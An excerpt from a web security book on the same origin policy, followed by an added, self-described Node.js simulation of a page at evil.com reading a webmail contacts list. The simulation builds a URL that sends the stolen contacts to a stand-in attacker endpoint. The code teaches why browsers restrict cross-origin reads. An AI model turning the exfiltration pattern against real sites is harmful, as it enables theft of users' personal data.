
Rich Cannings, Himanshu Dwivedi, Zane Lackey, and Alex Stamos

"Hacking Exposed Web 2.0: Web 2.0 Security Secrets and Solutions"

Chapter 2: Cross-Site Scripting (page 25)

Finally, it calls sendInfoToEvilSite(callbackFunction()) after 1.5 seconds, a generous amount of time for the browser to make the request to somesite.com. Therefore, you should not extend document.domain for other purposes.

What Happens if the Same Origin Policy Is Broken?
The same origin policy ensures that an "evil" web site cannot access other web sites, but what if the same origin policy was broken or not there at all? What could an attacker do? Let's consider one hypothetical example.
Suppose that an attacker made a web page at http://www.evil.com/index.html that
could read HTTP responses from another domain, such as a webmail application, and the
attacker was able to lure the webmail users to http://www.evil.com/index.html. Then
the attacker would be able to read the contacts of the lured users. This would be done
with the following JavaScript in http://www.evil.com/index.html:






All your contacts are belong to us.
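The attack the paragraph describes, written out as an added example rather than the book's own listing: a small Node.js model of a browser that either enforces or ignores the same origin policy, with the evil.com page trying to read the webmail contacts list through it. The host webmail.example, the newline-separated /contacts response, and the /collect endpoint on www.evil.com are constructed for this example and are not from the page.

```javascript
// Added example, not code from "Hacking Exposed Web 2.0".
// Models what http://www.evil.com/index.html could do if a browser
// let a page read responses from another origin.

// Constructed: the webmail server and what it returns to a logged-in user.
const WEBMAIL_ORIGIN = "http://webmail.example";
const webmailResponses = {
  "/contacts": "alice@example.com\nbob@example.com\ncarol@example.com",
};

// Origin = scheme + host + port, the unit the same origin policy compares.
function originOf(url) {
  return new URL(url).origin;
}

// Toy network layer. The browser sends the request (with the victim's
// cookies) no matter which page initiated it; the policy question is only
// whether the initiating page may read the reply.
function serverFetch(url) {
  const u = new URL(url);
  if (u.origin === WEBMAIL_ORIGIN && webmailResponses[u.pathname] !== undefined) {
    return webmailResponses[u.pathname];
  }
  return null;
}

// A cross-origin read as the browser would mediate it.
// enforceSOP=false is the "broken or not there at all" world from the text.
function readResponse(pageUrl, targetUrl, enforceSOP) {
  const body = serverFetch(targetUrl);
  if (body === null) return null;
  if (enforceSOP && originOf(pageUrl) !== originOf(targetUrl)) {
    // A real browser makes the body unreadable to script at this point.
    throw new Error(
      "same origin policy: " + originOf(pageUrl) + " may not read " + originOf(targetUrl)
    );
  }
  return body;
}

// Turn the contacts body into the list the attacker wants.
function parseContacts(body) {
  return body.split("\n").map((s) => s.trim()).filter(Boolean);
}

// The URL the evil page would request (for example as an <img> src) to
// ship the stolen list back to the attacker's server. Hypothetical endpoint.
function buildExfilUrl(contacts) {
  return "http://www.evil.com/collect?contacts=" + encodeURIComponent(contacts.join(","));
}

// What the script in http://www.evil.com/index.html does end to end.
function stealContacts(enforceSOP) {
  const page = "http://www.evil.com/index.html";
  try {
    const body = readResponse(page, WEBMAIL_ORIGIN + "/contacts", enforceSOP);
    const contacts = parseContacts(body);
    return { stolen: contacts, exfilUrl: buildExfilUrl(contacts) };
  } catch (e) {
    return { stolen: [], error: e.message };
  }
}

// Stand-alone run: first without the policy, then with it.
console.log("no SOP:  ", stealContacts(false));
console.log("with SOP:", stealContacts(true));
```

The point the model makes is that the request itself is not what the policy stops: in a real browser the evil page can still cause the request to webmail.example, and the victim's cookies go with it, but without a CORS grant from webmail.example the response is opaque to the evil page's script, so there is nothing to send to www.evil.com. Remove that read restriction and the whole contacts list leaves with one lure.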

